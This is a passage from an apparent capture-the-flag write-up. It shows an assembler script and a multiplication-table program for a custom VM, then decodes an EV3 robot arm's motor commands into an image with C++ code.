    <span class="hljs-keyword">if</span> e <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> labels:
        <span class="hljs-keyword">raise</span> KeyError(<span class="hljs-string">'Undefined label: %s'</span> % e)
    e = push(labels[e])[<span class="hljs-number">0</span>].ljust(<span class="hljs-number">20</span>, opmap[<span class="hljs-string">'nop'</span>])
    <span class="hljs-keyword">assert</span> len(e) == <span class="hljs-number">20</span>
    out[i] = e

<span class="hljs-keyword">with</span> open(sys.argv[<span class="hljs-number">2</span>], <span class="hljs-string">'w'</span>) <span class="hljs-keyword">as</span> f:
    f.write(<span class="hljs-string">''</span>.join(out))</code></pre><p>And it becomes a simple programming challange:</p>
<pre class="hljs"><code>start:
    alloc <span class="hljs-number">10</span>

    alloc <span class="hljs-number">10</span>

    alloc <span class="hljs-number">10</span>

    <span class="hljs-comment">; Initialize const
</span>    <span class="hljs-keyword">store</span> <span class="hljs-number">2</span> <span class="hljs-number">0</span> <span class="hljs-number">0x31</span>
    <span class="hljs-keyword">store</span> <span class="hljs-number">2</span> <span class="hljs-number">1</span> <span class="hljs-number">0x20</span>

    <span class="hljs-comment">; Initialize lhs
</span>    <span class="hljs-keyword">load</span> <span class="hljs-number">2</span> <span class="hljs-number">0</span>
    <span class="hljs-keyword">store</span> <span class="hljs-number">0</span> <span class="hljs-number">0</span>

    <span class="hljs-keyword">load</span> <span class="hljs-number">2</span> <span class="hljs-number">1</span>
    <span class="hljs-keyword">store</span> <span class="hljs-number">0</span> <span class="hljs-number">1</span>

    <span class="hljs-keyword">store</span> <span class="hljs-number">0</span> <span class="hljs-number">2</span> <span class="hljs-number">0x2A</span>

    <span class="hljs-keyword">load</span> <span class="hljs-number">2</span> <span class="hljs-number">1</span>
    <span class="hljs-keyword">store</span> <span class="hljs-number">0</span> <span class="hljs-number">3</span>

    <span class="hljs-keyword">load</span> <span class="hljs-number">2</span> <span class="hljs-number">0</span>
    <span class="hljs-keyword">store</span> <span class="hljs-number">0</span> <span class="hljs-number">4</span>

    <span class="hljs-keyword">load</span> <span class="hljs-number">2</span> <span class="hljs-number">1</span>
    <span class="hljs-keyword">store</span> <span class="hljs-number">0</span> <span class="hljs-number">5</span>

    <span class="hljs-keyword">store</span> <span class="hljs-number">0</span> <span class="hljs-number">6</span> <span class="hljs-number">0x3D</span>

    <span class="hljs-keyword">load</span> <span class="hljs-number">2</span> <span class="hljs-number">1</span>
    <span class="hljs-keyword">store</span> <span class="hljs-number">0</span> <span class="hljs-number">7</span>

    <span class="hljs-comment">; Initialize reg
</span>    <span class="hljs-keyword">store</span> <span class="hljs-number">1</span> <span class="hljs-number">0</span> <span class="hljs-number">0x1</span>
    <span class="hljs-keyword">store</span> <span class="hljs-number">1</span> <span class="hljs-number">1</span> <span class="hljs-number">0x1</span>

    loop_out:
        <span class="hljs-keyword">load</span> <span class="hljs-number">2</span> <span class="hljs-number">0</span>
        <span class="hljs-keyword">store</span> <span class="hljs-number">0</span> <span class="hljs-number">4</span>

        <span class="hljs-keyword">store</span> <span class="hljs-number">1</span> <span class="hljs-number">1</span> <span class="hljs-number">1</span>

        loop_in:
            write <span class="hljs-number">0</span>

            <span class="hljs-keyword">load</span> <span class="hljs-number">1</span> <span class="hljs-number">0</span>
            <span class="hljs-keyword">load</span> <span class="hljs-number">1</span> <span class="hljs-number">1</span>
            <span class="hljs-keyword">mul</span>
            puti

            puts <span class="hljs-number">10</span> <span class="hljs-number">0</span>

            <span class="hljs-comment">; cond_in
</span>            <span class="hljs-keyword">load</span> <span class="hljs-number">1</span> <span class="hljs-number">1</span>
            <span class="hljs-keyword">eq</span> <span class="hljs-number">9</span>
            jt break_in

            <span class="hljs-keyword">load</span> <span class="hljs-number">0</span> <span class="hljs-number">4</span>
            <span class="hljs-keyword">add</span> <span class="hljs-number">1</span>
            <span class="hljs-keyword">store</span> <span class="hljs-number">0</span> <span class="hljs-number">4</span>

            <span class="hljs-keyword">load</span> <span class="hljs-number">1</span> <span class="hljs-number">1</span>
            <span class="hljs-keyword">add</span> <span class="hljs-number">1</span>
            <span class="hljs-keyword">store</span> <span class="hljs-number">1</span> <span class="hljs-number">1</span>

            jmp loop_in

        break_in:

        <span class="hljs-comment">; cond_out
</span>        <span class="hljs-keyword">load</span> <span class="hljs-number">1</span> <span class="hljs-number">0</span>
        <span class="hljs-keyword">eq</span> <span class="hljs-number">9</span>
        jt break_out

        <span class="hljs-keyword">load</span> <span class="hljs-number">0</span> <span class="hljs-number">0</span>
        <span class="hljs-keyword">add</span> <span class="hljs-number">1</span>
        <span class="hljs-keyword">store</span> <span class="hljs-number">0</span> <span class="hljs-number">0</span>

        <span class="hljs-keyword">load</span> <span class="hljs-number">1</span> <span class="hljs-number">0</span>
        <span class="hljs-keyword">add</span> <span class="hljs-number">1</span>
        <span class="hljs-keyword">store</span> <span class="hljs-number">1</span> <span class="hljs-number">0</span>

        jmp loop_out

    break_out:
    exit</code></pre><h2 id="rev"><a class="header-link" href="#rev"></a>Rev</h2>
<h3 id="ev3-arm"><a class="header-link" href="#ev3-arm"></a>EV3 Arm</h3>
<p>Use the step in <code>EV3 Payer</code> to extract the rbf file.</p>
<p>Upload the rbf to this website.
<a href="http://ev3treevis.azurewebsites.net/">http://ev3treevis.azurewebsites.net/</a></p>
<p>Use some regular expression replace to these format.</p>
<pre class="hljs"><code>B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">360</span> <span class="hljs-number">75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">180</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">180</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
C <span class="hljs-number">1</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">90</span> <span class="hljs-number">75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">450</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">4</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">3.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">420</span> <span class="hljs-number">75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">300</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">320</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">400</span> <span class="hljs-number">-75</span>
A <span class="hljs-number">420</span> <span class="hljs-number">75</span>
C' <span class="hljs-number">2</span> <span class="hljs-number">60</span>
A <span class="hljs-number">120</span> <span class="hljs-number">15</span>
A <span class="hljs-number">480</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">660</span> <span class="hljs-number">75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">0.5</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">300</span> <span class="hljs-number">-75</span>
C' <span class="hljs-number">0.3</span> <span class="hljs-number">-90</span>
A <span class="hljs-number">120</span> <span class="hljs-number">-75</span>
C' <span class="hljs-number">0.3</span> <span class="hljs-number">90</span>
A <span class="hljs-number">300</span> <span class="hljs-number">-75</span>
C <span class="hljs-number">0.5</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C' <span class="hljs-number">2.2</span> <span class="hljs-number">35</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
A <span class="hljs-number">360</span> <span class="hljs-number">75</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
A <span class="hljs-number">420</span> <span class="hljs-number">75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">300</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">360</span> <span class="hljs-number">75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C' <span class="hljs-number">2.2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
A <span class="hljs-number">420</span> <span class="hljs-number">75</span>
A <span class="hljs-number">600</span> <span class="hljs-number">-75</span>
C <span class="hljs-number">0.75</span> <span class="hljs-number">-70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
C <span class="hljs-number">0.75</span> <span class="hljs-number">70</span>
A <span class="hljs-number">900</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">720</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">400</span> <span class="hljs-number">-75</span>
A <span class="hljs-number">420</span> <span class="hljs-number">75</span>
C' <span class="hljs-number">2</span> <span class="hljs-number">60</span>
A <span class="hljs-number">120</span> <span class="hljs-number">15</span>
A <span class="hljs-number">480</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">700</span> <span class="hljs-number">75</span>
C <span class="hljs-number">3.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">420</span> <span class="hljs-number">75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">300</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
C <span class="hljs-number">1</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">90</span> <span class="hljs-number">75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">450</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">720</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">180</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">180</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">-75</span>
C' <span class="hljs-number">1</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">180</span> <span class="hljs-number">25</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">900</span> <span class="hljs-number">75</span>
C <span class="hljs-number">2.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">400</span> <span class="hljs-number">-75</span>
A <span class="hljs-number">120</span> <span class="hljs-number">75</span>
C' <span class="hljs-number">2</span> <span class="hljs-number">60</span>
A <span class="hljs-number">120</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">480</span> <span class="hljs-number">75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">280</span> <span class="hljs-number">75</span>
C <span class="hljs-number">3.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A' <span class="hljs-number">360</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">-60</span>
C <span class="hljs-number">2</span> <span class="hljs-number">80</span>
C <span class="hljs-number">2</span> <span class="hljs-number">-60</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
C <span class="hljs-number">1</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">90</span> <span class="hljs-number">75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">450</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">720</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">400</span> <span class="hljs-number">-75</span>
A <span class="hljs-number">120</span> <span class="hljs-number">75</span>
C' <span class="hljs-number">2</span> <span class="hljs-number">60</span>
A <span class="hljs-number">120</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">480</span> <span class="hljs-number">75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">280</span> <span class="hljs-number">75</span>
C <span class="hljs-number">3.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A' <span class="hljs-number">360</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">-60</span>
C <span class="hljs-number">2</span> <span class="hljs-number">80</span>
C <span class="hljs-number">2</span> <span class="hljs-number">-60</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">540</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">240</span> <span class="hljs-number">75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">480</span> <span class="hljs-number">-75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">780</span> <span class="hljs-number">75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">720</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
C <span class="hljs-number">1</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">90</span> <span class="hljs-number">75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">450</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">2.5</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">360</span> <span class="hljs-number">75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">540</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">240</span> <span class="hljs-number">75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">480</span> <span class="hljs-number">-75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">780</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">720</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">720</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">420</span> <span class="hljs-number">75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">800</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">1100</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">400</span> <span class="hljs-number">-75</span>
A <span class="hljs-number">420</span> <span class="hljs-number">75</span>
C' <span class="hljs-number">1.5</span> <span class="hljs-number">60</span>
A <span class="hljs-number">120</span> <span class="hljs-number">15</span>
A <span class="hljs-number">60</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">280</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">180</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">180</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">400</span> <span class="hljs-number">-75</span>
A <span class="hljs-number">420</span> <span class="hljs-number">75</span>
C' <span class="hljs-number">2</span> <span class="hljs-number">60</span>
A <span class="hljs-number">120</span> <span class="hljs-number">15</span>
A <span class="hljs-number">480</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">700</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
C <span class="hljs-number">1</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">90</span> <span class="hljs-number">75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">450</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
C <span class="hljs-number">2.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">540</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
A <span class="hljs-number">240</span> <span class="hljs-number">75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">-70</span>
A <span class="hljs-number">480</span> <span class="hljs-number">-75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">780</span> <span class="hljs-number">75</span>
C <span class="hljs-number">1.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">360</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
A <span class="hljs-number">400</span> <span class="hljs-number">-75</span>
A <span class="hljs-number">420</span> <span class="hljs-number">75</span>
C' <span class="hljs-number">1.5</span> <span class="hljs-number">60</span>
A <span class="hljs-number">120</span> <span class="hljs-number">15</span>
A <span class="hljs-number">60</span> <span class="hljs-number">-75</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">280</span> <span class="hljs-number">75</span>
C <span class="hljs-number">2</span> <span class="hljs-number">70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">-15</span>
C <span class="hljs-number">0.5</span> <span class="hljs-number">70</span>
A <span class="hljs-number">300</span> <span class="hljs-number">-75</span>
C' <span class="hljs-number">0.3</span> <span class="hljs-number">90</span>
A <span class="hljs-number">120</span> <span class="hljs-number">-75</span>
C' <span class="hljs-number">0.3</span> <span class="hljs-number">-90</span>
A <span class="hljs-number">300</span> <span class="hljs-number">-75</span>
C <span class="hljs-number">0.5</span> <span class="hljs-number">-70</span>
B <span class="hljs-number">35</span> <span class="hljs-number">15</span>
A <span class="hljs-number">720</span> <span class="hljs-number">75</span>
D</code></pre><p>And write this code to generate the image.</p>
<pre class="hljs"><code><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">tmp</span><span class="hljs-params">()</span></span>{
    Pic png;
    <span class="hljs-keyword">for</span>(<span class="hljs-keyword">int</span> i=<span class="hljs-number">0</span>;i&lt;<span class="hljs-number">300</span>;i++){
        png.push_back(<span class="hljs-built_in">vector</span>&lt;Color&gt;(<span class="hljs-number">3000</span>,Color(<span class="hljs-number">0</span>,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>)));
    }
    <span class="hljs-keyword">int</span> dwn=<span class="hljs-literal">false</span>;
    <span class="hljs-keyword">double</span> x=<span class="hljs-number">50</span>,y=<span class="hljs-number">50</span>;
    <span class="hljs-keyword">double</span> vx=<span class="hljs-number">0</span>,vy=<span class="hljs-number">0</span>;
    <span class="hljs-keyword">int</span> tx=<span class="hljs-number">0</span>,ty=<span class="hljs-number">0</span>;
    <span class="hljs-keyword">int</span> wait_fin=<span class="hljs-number">1</span>;
    <span class="hljs-keyword">while</span>(<span class="hljs-literal">true</span>){
        <span class="hljs-keyword">char</span> m[<span class="hljs-number">10</span>];

        <span class="hljs-keyword">if</span>(wait_fin||(!tx&amp;&amp;!ty)){
            <span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%s"</span>,m);
            <span class="hljs-comment">//printf("%s\n",m);</span>
            <span class="hljs-keyword">if</span>(m[<span class="hljs-number">0</span>]==<span class="hljs-string">'D'</span>){
                <span class="hljs-keyword">break</span>;
            }
            <span class="hljs-keyword">double</span> pw, rd;
            <span class="hljs-built_in">scanf</span>(<span class="hljs-string">"%lf%lf"</span>,&amp;rd,&amp;pw);
            <span class="hljs-keyword">if</span>(m[<span class="hljs-number">0</span>]==<span class="hljs-string">'B'</span>){
                dwn=pw&lt;<span class="hljs-number">0</span>;
            }
            <span class="hljs-keyword">if</span>(m[<span class="hljs-number">0</span>]==<span class="hljs-string">'A'</span>){
                pw/=<span class="hljs-number">100</span>;
                ty+=rd/<span class="hljs-built_in">abs</span>(pw)/<span class="hljs-number">4</span>/<span class="hljs-number">2</span>;
                vy=-pw;
            }
            <span class="hljs-keyword">if</span>(m[<span class="hljs-number">0</span>]==<span class="hljs-string">'C'</span>){
                pw/=<span class="hljs-number">100</span>;
                rd*=<span class="hljs-number">40</span>;
                tx+=rd/<span class="hljs-built_in">abs</span>(pw)/<span class="hljs-number">2</span>;
                vx=pw;
            }
            <span class="hljs-keyword">if</span>(m[<span class="hljs-number">1</span>]==<span class="hljs-string">'\''</span>)
                wait_fin=<span class="hljs-number">1</span>;
            <span class="hljs-keyword">else</span>
                wait_fin=<span class="hljs-number">0</span>;
        }
        <span class="hljs-keyword">if</span>(dwn)png[min(max((<span class="hljs-keyword">int</span>)y,<span class="hljs-number">0</span>),<span class="hljs-number">250</span>)][min(max((<span class="hljs-keyword">int</span>)x,<span class="hljs-number">0</span>),<span class="hljs-number">2950</span>)]=Color(<span class="hljs-number">255</span>,<span class="hljs-number">255</span>,<span class="hljs-number">255</span>);
        <span class="hljs-keyword">if</span>(tx&gt;<span class="hljs-number">0</span>){
            tx=max(tx<span class="hljs-number">-1</span>,<span class="hljs-number">0</span>);
            x+=vx;
        }
        <span class="hljs-keyword">if</span>(ty&gt;<span class="hljs-number">0</span>){
            ty=max(ty<span class="hljs-number">-1</span>,<span class="hljs-number">0</span>);
            y+=vy;
        }
        <span class="hljs-comment">//printf("%d %d %d %d %d %d\n",x,y,vx,vy,tx,ty);</span>
    }
